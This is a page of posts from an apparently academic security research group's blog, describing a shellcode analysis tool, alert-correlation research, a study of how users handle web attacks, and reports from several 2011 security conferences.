Shellzer: a tool for the dynamic analysis of malicious shellcode

Posted on January 10, 2012 by

Last September, I presented Shellzer at RAID 2011 conference. Shellzer is a tool that I developed back in August 2010, that aims to dynamically analyze malicious shellcode. The main goal was to analyze the shellcode samples that have been collected by running Wepawet during these years. Due to the size of our dataset (about 30,000 shellcode samples at that time), an automated approach was clearly needed.

After trying several approaches and tools, I came across PyDbg, a python Win32 debugging abstraction class. By using it, I started to write my own tool to dynamically analyze a given shellcode. My very first attempt consisted in single-step executing the whole shellcode binary. This resulted in having the complete control over the sample’s execution, and being the shellcode a malicious piece of code, it was an ideal feature. But unfortunately, this approach is not feasible to be used in practice. In fact, the number of assembly instructions that have to be executed at run-time is in the order of millions, even if shellcode is commonly few hundreds of bytes long. This is due to the fact that many loops are present, and some of them are executed thousands of times. Moreover, Windows API functions are invoked by the shellcode. These two factors cause a huge overhead for an approach based on single-stepping, and the analysis was consequently lasting several minutes in average.

My research has been focused to find how to avoid to single-step the whole shellcode’s execution, while maintaining the complete control over it. This has proved to be challenging, due to the many evasion techniques that are used by these pieces of code. If you are interested in the details, please read the paper. The output of the analysis currently consists in the detailed trace of the Windows API functions called (with their parameters and return value), the Windows DLLs that have been loaded, and the list of the URLs contacted by the shellcode. Furthermore, Shellzer supports the analysis of shellcode samples extracted from malicious PDF documents, other than those detected in web-based drive-by-download attacks.

Starting from November 2011, this tool started to be used by Wepawet. When a shellcode is detected, it will be automatically forwarded to the shellcode analyzer and the Shellzer’s report will be included in the main Wepawet’s report. Read this post for more details. Naturally, the tool is not perfect and some samples cannot be analyzed yet. If after submitting a sample to Wepawet, a shellcode is detected and you don’t see the additional shellcode information, it means that something went wrong. Please, don’t hesitate to contact us in case of errors: we need your feedback!

Posted in Binary Analysis, Web Security | Leave a comment

Report from SecurityZone 2011 – The 1st International Security Conference in Colombia (Cali)

Posted on December 20, 2011 by

Last month I was invited to Cali’s SecurityZone for the 1st International Security Conference of Colombia. Edgar Rojas, CEO of The MuRo Group, brought together 16 well-known and strong international security experts for a 2+1 days of conference in a DEFCON/BlackHat style. Among them, strong personalities such as Ian Amit, Chris John Riley, Stefan Friedli and Chris Nickerson have animated the event by talking of cyberwar attacks, compliance, read team testing and threats modeling.

The numbers alone document the success of this first security event in Colombia: the conference hosted more than 450 attendees from all over Colombia, UK, USA, Venezuela, Brazil, Argentina, and Mexico, and over 2400 people were connected via streaming.

But the SecurityZone’s success is not only a matter of numbers: Among the many conferences I have been in these last days, SecurityZone has been certainly one of the best for their people. The organizers did an excellent job in putting together this event. I won’t forget their cordiality, kindness, friendly and always smiling attitude. At the same time, our attendees were hungry of knowledge, always asking for information and photos :-)

I am now looking forward to SecurityZone 2012, and in the meanwhile follow us on Twitter!

Posted in Conferences | Leave a comment

About Nexat paper in ACSAC 2011

Posted on December 13, 2011 by

Last week, our group attended ACSAC 2011. The conference was held in Buena Vista Palace, Orlando, Florida. I presented Nexat paper, and the feedbacks were encouraging.

Nexat was a research project in collaboration with Casey Cipriano, and Amir Houmansadr. Nexat tries to solve a problem a typical security administrator nowadays faces. The security administrators are normally overwhelmed with the amount of security alerts their monitoring tools generate. They also cannot keep up with the stream of the events and predict the next security related events. Therefore, the administrators are usually reactive.

The reason for this problem is that the battlefield of security is not even. A simple button hit by an attacker may cause thousands of alerts to be generated on administrators side. Nexat tries to even the field by deducing relationship between different sets of alerts. Nexat is able to detect related alerts (alerts which may be part of the same attack) and uses them to predict the next step of the attack. This way, Nexat lets the administrators to be one step ahead of the attackers. Nexat does not require a priori knowledge about attacks, which makes it able to detect and predict new types of attack as long as they are composed of detectable steps. We used the alerts generated by Snort in iCTF 2008.

Posted in Systems Security | Leave a comment

Insights into User Behavior in Dealing with Internet Attacks

Posted on November 22, 2011 by

At last, we finalized analyzing the data from the user experiments we had conducted earlier this year, and collected the results in the paper “Insights into User Behavior in Dealing with Internet Attacks”, that is going to appear at NDSS, in February 2012.

Many Internet attacks have a strong human aspect; they require some sort of user interaction, such as clicking on a malicious link. In order to understand how users cope with these attacks, and how they judge the security implications of the actions they take, we built an online security test platform and conducted experiments with over 160 Internet users, with diverse backgrounds and technical sophistication. We presented the participants with concrete security scenarios exemplifying prevalent attacks such as XSS, link manipulation tricks and file sharing scams, and observed their decisions.

To very briefly summarize some of our interesting findings:

  • Non-technical users largely failed to recognize threats, and assess the consequences of their actions. Interestingly, they were still able to avert relatively simple attacks solely based on their intuition, and frequent exposure to similar situations in the past.
  • Many users treated the ‘length’ of URLs as a sign of maliciousness. They avoided long and complicated URLs claiming those look suspicious, but followed shorter (but malicious!) links. Analogously, users often made misinformed decisions based on the ‘size’ of files.
  • Non-technical users were mostly unaware of how shortened URLs (e.g., TinyURL) work; none of them reported knowing how to check the real link destinations.
  • Trick banners commonly found in file sharing sites had a high success rate of tricking the participants, even those who were tech-savvy.

I would like to prompt you to read the paper if you are interested in the details of the tests, and our analysis & discussion of the results. I would also like to give my thanks to everyone who participated in our tests!

Posted in Web Security | Leave a comment

Report from RAID 2011

Posted on October 18, 2011 by

A few weeks ago we attended the 14th Recent Advances in Intrusion Detection (RAID) Symposium in Menlo Park, California. The conference was held at SRI International and featured 20 talks about malware, application security, anomaly detection and network security.

Our group presented three papers: Yanick talked about Shellzer, a tool for the dynamic analysis of malicious shellcode, which will soon be integrated with Wepawet. Bob presented Dymo, a system that provides a dynamic code identity primitive that tracks the run-time integrity of a process and can also produce labels for network packets to distinguish between legitimate and malicious network activity.

I talked about Disarm, which I developed together with Paolo and Clemens for my Master degree at the Vienna University of Technology. Operating the dynamic malware analysis sandbox Anubis we are very interested in detecting environment-sensitive malware that is capable of fingerprinting Anubis and evading the analysis. Disarm therefore automates the screening of malware samples for evasive behavior and helped us discover several evasion techniques used by malware against Anubis (and also other dynamic analysis sandboxes).

I was pleased with the positive feedback and interest in our work and thoroughly enjoyed the conference, especially meeting colleagues from UCSB and the Institute Eurécom and other experts from the security community.

Posted in Conferences | Leave a comment

Report from the USENIX Security Symposium 2011

Posted on August 19, 2011 by

Last week we attended the 20th USENIX Security Symposium in San Francisco. Taking advantage of the high availability of travel grants and of the fact that the conference was close to Santa Barbara, we packed a minivan with people and drove up north.

As a group, we presented two papers at the conference. I gave my talk on BotMagnifier, about which I already blogged in the past. The paper was well received by the audience, and I had many questions asked, some of which will help improving the system for future work. The other paper our group presented was  JACKSTRAWS: Picking Command and Control Connections from Bot Traffic. Gregoire presented this paper, which is a collaboration between UCSB and our colleagues at Ruhr University Bochum. In this paper they presented Jackstrows, a system that is able to identify C&C connections and, by using machine learning techniques, builds models of such connections, with the goal of matching such behaviors with the models generated by unknown bots.

The level of the conference was really good, and we attended to several interesting talks.  Manos Antonakakis presented a system for detecting domains used by malware by looking at the upper DNS hierarchy. This approach is very similar to the EXPOSURE system developed by our group, but is operating at a higher level. Another interesting talk was given by Chris Grier. They infiltrated 4 large pay-per-install services and studied the dynamics and the market behind malware droppers. I also enjoyed the talk by Edward Schwartz, who presented Q, a system that automatically builds ROP payloads for vulnerable binaries. However, a problem with this paper is that while it does a good job in showing how existing defenses can be bypassed by using ROP, it is not as successful in discussing the efforts made by the research community for fighting such attacks. For example, the paper  ”G-Free: Defeating Return-Oriented Programming through Gadget-less Binaries”, which had been published by our group last year and provided a defense against ROP is not even mentioned in their related work discussion.

Posted in Conferences | Leave a comment

Report from Amsterdam (OWASP & DIMVA)

Posted on July 12, 2011 by

Last week I was in Amsterdam for an intensive three days of conferencing, talks and social events. On the first evening, I was kindly invited to join the OWASP Netherlands Chapter Meeting to present the work we recently did together with the KULeuven guys about the (in)security of File Hosting Services. In this research we explain why hosting providers do not put enough effort in providing security aware services. If you are interested in this topic, you can take a look at the report of The Register.

On the second day, I was attending DIMVA 2011, a popular european conference in security, where I could meet many well-known people. This year, the conference was hosted by Herbert Bos, VU University, who did his best for bring security experts together, in a friendly and relaxed atmosphere. The social event was organized on a 40meter sailing boat where we had our dinner. DIMVA was featuring as well a Capture the Flag (dCTF). 40 teams from universities and the underground participated. Our team from EURECOM played well and we were 7th:  a good result when considering that more than half of the team was composed of students.

My talk at DIMVA (slides) was about a new attack against Social Network users that we call Reverse Social Engineering. Basically the idea is to feed victims with a pretext to get back to the attacker instead of the attacker contacting the victims. By running this experiments on three different vulnerable providers, we showed that a single honeypot profile can easily attract thousands of unsuspicious users. Compared to his “little brother”, the reverse flavor of social engineering can potentially reach millions of victims easily, and can by-pass current behavioral and filter-based detection.

 

 

 

 

 

 

 

 

 

 

 

 

Posted in Web Security | Leave a comment